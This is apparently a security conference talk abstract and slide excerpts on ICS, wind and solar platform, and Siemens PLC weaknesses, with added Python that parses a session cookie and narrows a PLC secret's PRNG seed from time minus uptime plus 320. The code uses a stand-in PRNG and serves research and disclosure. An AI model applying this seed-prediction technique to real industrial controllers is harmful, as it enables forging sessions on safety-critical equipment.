For two years SCADA StrangeLove has been speaking about Industrial Control Systems and nuclear plants. This year we want to discuss Green Energy: our hackers' vision of Green Energy, Smart Grids and cloud IoT technology.
Our latest research was devoted to the analysis of the architecture and implementation of the most widespread platforms for wind and solar energy generation, platforms that produce many gigawatts of power. It may seem (not) surprising, but the systems which manage huge turbine towers and household photovoltaic plants are not only connected to the Internet but also prone to many well-known vulnerabilities and low-hanging 0-days. Even if these systems cannot be found via Shodan, fancy cloud technologies leave no chance for security.

We will also speak about the security problems of traditional "heavy" industrial solutions, about the things that Zurich Airport and the Large Hadron Collider have in common, and why one should not develop a brand new web server. Especially for the specialists on the other side of the fence, we will show, by the example of one industry, the link between information security and industrial safety, and will also demonstrate how root access gained in a few minutes can bring to nought all the years of effort devoted to improving the fail-safety and reliability of an ICS.

On top of that you will learn about our new releases, some funny and not so funny stories about the discovery and fixing of vulnerabilities, and the latest news from the front of the struggle for the Purity of Essence.
──────────
➤Speaker: Sergey Gordeychik, Aleksandr Timorin
2. Group of security researchers focused on ICS/SCADA
to save Humanity from industrial disaster
and to keep Purity Of Essence
Alexander Timorin
Alexander Tlyapov
Alexander Zaitsev
Alexey Osipov
Andrey Medov
Artem Chaykin
Denis Baranov
Dmitry Efanov
Dmitry Nagibin
Dmitry Serebryannikov
Dmitry Sklyarov
Evgeny Ermakov
Gleb Gritsai
Ilya Karpov
Ivan Poliyanchuk
Kirill Nesterov
Roman Ilin
Sergey Bobrov
Sergey Drozdov
Sergey Gordeychik
Sergey Scherbel
Timur Yunusov
Valentin Shilnenkov
Vladimir Kochetkov
Vyacheslav Egoshin
Yuri Goltsev
Yuriy Dyachenko
18. --snip--
Comment to PT-SOL-2014001:
The upload path has been changed. It is still possible to upload files, but they can't overwrite system critical parts any more.
Comment to PT-SOL-2014002:
The system backup is created in a randomly chosen path and deleted afterwards. Therefore unauthorized access is made much more difficult and very unlikely.
Second comment to PT-SOL-2014002:
In order to compensate for the weak encryption in the configuration file, the whole configuration file is now encrypted via the new HTTP transmission.
--snip--
69. Cookie layout, 44 bytes, field by field:
3e6cd1f7bdf743cac6dcba708c21994f - MD5 of ? (16 bytes)
d37fa1c3 - CONST (4 bytes)
0001 - user logout counter (2 bytes)
0001 - counter of issued cookies for this user (2 bytes)
00028ad7 - value that doesn't matter (4 bytes)
0a00aac8 - user IP address (10.0.170.200) (4 bytes)
00000000000000008ad72143 - value that doesn't matter (12 bytes)
So, what about
3e6cd1f7bdf743cac6dcba708c21994f ???
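As an added example (not from the slides and not the authors' tooling), a parser for the 44-byte layout above. The sample token is the slide's hex fields concatenated in order, so it is constructed rather than captured; the field names and the `unknown_bits` helper are this example's own. The point it makes is the one the slide asks about: every field except the 16-byte digest is a constant, a small counter, or the client's own address, so the token's unpredictability rests entirely on that digest.

```python
import struct
from ipaddress import IPv4Address

COOKIE_LEN = 44                  # 16 + 4 + 2 + 2 + 4 + 4 + 12 bytes
EXPECTED_CONST = 0xD37FA1C3      # the 4-byte constant from the slide

# Constructed sample: the slide's fields concatenated in order (not a captured token).
SAMPLE_COOKIE_HEX = (
    "3e6cd1f7bdf743cac6dcba708c21994f"   # MD5 of ? (16 bytes)
    "d37fa1c3"                           # CONST (4 bytes)
    "0001"                               # user logout counter (2 bytes)
    "0001"                               # counter of issued cookies (2 bytes)
    "00028ad7"                           # value that does not matter (4 bytes)
    "0a00aac8"                           # user IP address (4 bytes)
    "00000000000000008ad72143"           # value that does not matter (12 bytes)
)

# Big-endian layout matching the slide's field sizes.
_LAYOUT = struct.Struct(">16sIHHI4s12s")


def parse_session_cookie(raw: bytes) -> dict:
    """Split a raw 44-byte cookie into its fields (names are this example's, not the vendor's)."""
    if len(raw) != COOKIE_LEN:
        raise ValueError(f"expected {COOKIE_LEN} bytes, got {len(raw)}")
    digest, const, logouts, issued, skip1, ip_raw, skip2 = _LAYOUT.unpack(raw)
    return {
        "digest": digest.hex(),            # the only field whose origin is unknown
        "const": const,
        "const_ok": const == EXPECTED_CONST,
        "logout_counter": logouts,
        "issued_cookies": issued,
        "client_ip": str(IPv4Address(ip_raw)),
        "ignored": (skip1, skip2.hex()),
    }


def unknown_bits(fields: dict) -> int:
    """Bits of the token an attacker cannot reconstruct from observable data.

    The counters are small integers, the constant is fixed and the IP is the
    client's own, so everything rides on the 16-byte digest (assuming the
    input it was computed over stays unknown)."""
    return len(bytes.fromhex(fields["digest"])) * 8


if __name__ == "__main__":
    f = parse_session_cookie(bytes.fromhex(SAMPLE_COOKIE_HEX))
    for k, v in f.items():
        print(f"{k:15} {v}")
    print("unknown bits:", unknown_bits(f))
```

The two "value that doesn't matter" fields are returned rather than discarded, so a token that differs there from the slide's sample is still visible to whoever is comparing captures.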
71. SECRET is generated after PLC start by a PRNG.
The PRNG is a little bit harder than the standard C PRNG.
SEED lies in the range 0x0000..0xFFFF.
65536 seeds is too much to brute-force against a live device (PLC so tender >_<).
72. What about SEED?
SEED very often depends on a time value:
SEED = PLC START TIME + 320
320 was found empirically: the secret is generated ~3-4 seconds after PLC start, using the current time.
How to obtain PLC START TIME?
73. PLC START TIME = CURRENT TIME – UPTIME
[screenshot: device page showing Current time and Uptime]
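The three slides above describe one procedure: read the device's current time and uptime, subtract to get the start time, add 320, and try the seeds around that value instead of all 65536. The example below is added here and is not the authors' tool; it carries that procedure through end to end. Two things in it are assumptions, not slide content: the PLC's PRNG is not given on the slides, so `toy_prng_secret` is a stand-in (a full-period 32-bit LCG run four times), and the time values in the demo are treated as 10 ms ticks so that 320 ticks matches the ~3-4 s delay. The `slack` window and all function names are this example's own.

```python
SEED_OFFSET = 320       # from the slides: SEED = PLC START TIME + 320 (found empirically)
SEED_MASK = 0xFFFF      # from the slides: SEED lies in 0x0000..0xFFFF
FULL_SEED_SPACE = SEED_MASK + 1


def plc_start_time(current_time: int, uptime: int) -> int:
    """PLC START TIME = CURRENT TIME - UPTIME (same units for both, whatever the PLC uses)."""
    return current_time - uptime


def seed_candidates(current_time: int, uptime: int, slack: int = 50):
    """Seeds worth trying, most likely first.

    `slack` (an assumption, not a slide value) absorbs jitter in the ~3-4 s startup
    delay and in reading the clock; it turns a 65536-seed search into 2*slack+1."""
    base = plc_start_time(current_time, uptime) + SEED_OFFSET
    for delta in sorted(range(-slack, slack + 1), key=abs):   # 0, -1, +1, -2, +2, ...
        yield (base + delta) & SEED_MASK


def toy_prng_secret(seed: int) -> int:
    """Stand-in for the PLC's PRNG (the real algorithm is not on the slides).

    Four rounds of a full-period 32-bit LCG: a bijection on 32-bit values, so
    distinct seeds give distinct secrets and the search cannot hit a false match."""
    x = seed & 0xFFFFFFFF
    for _ in range(4):
        x = (1103515245 * x + 12345) & 0xFFFFFFFF
    return x


def recover_seed(observed_secret: int, current_time: int, uptime: int,
                 secret_fn=toy_prng_secret, slack: int = 50):
    """Return (seed, attempts) for the first candidate whose secret matches, else (None, attempts).

    Against a real device `secret_fn` would be replaced by whatever check confirms
    a candidate (the slides stop before that step, so nothing is assumed here)."""
    attempts = 0
    for seed in seed_candidates(current_time, uptime, slack):
        attempts += 1
        if secret_fn(seed) == observed_secret:
            return seed, attempts
    return None, attempts


if __name__ == "__main__":
    # Constructed scenario, time in 10 ms ticks (an assumption; 320 ticks ~ 3.2 s).
    start = 1_000_000
    real_seed = (start + SEED_OFFSET + 7) & SEED_MASK      # 7 ticks of startup jitter
    secret = toy_prng_secret(real_seed)
    now, uptime = start + 50_000, 50_000                    # values read from the device later
    seed, tries = recover_seed(secret, now, uptime)
    print(f"seed {seed:#06x} found after {tries} of {FULL_SEED_SPACE} possible seeds")
```

Ordering the candidates by distance from the predicted seed matters on a fragile target: the expected number of requests is a handful, not half the window, and `slack` can be kept small as long as the clock and uptime are read close together.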
76. SCADASL, 13.01.2013:
S7 PLC private/public community string for SNMP protocol can't be changed …
Siemens, 06.02.2013:
… you cannot change the SNMP community string … This issue has no effect on security, as only non-sensitive information can be changed via SNMP. … community strings changeable in TIA Portal v12.5.
SCADASL, 05.08.2013:
… vulnerabilities related to S7 1500 and S7 1200 PLC in attached file … including hardcoded SNMP.
Siemens, 22.10.2013:
Hardcoded SNMP strings are in fact an issue …
We might eventually migrate to SNMPv3 …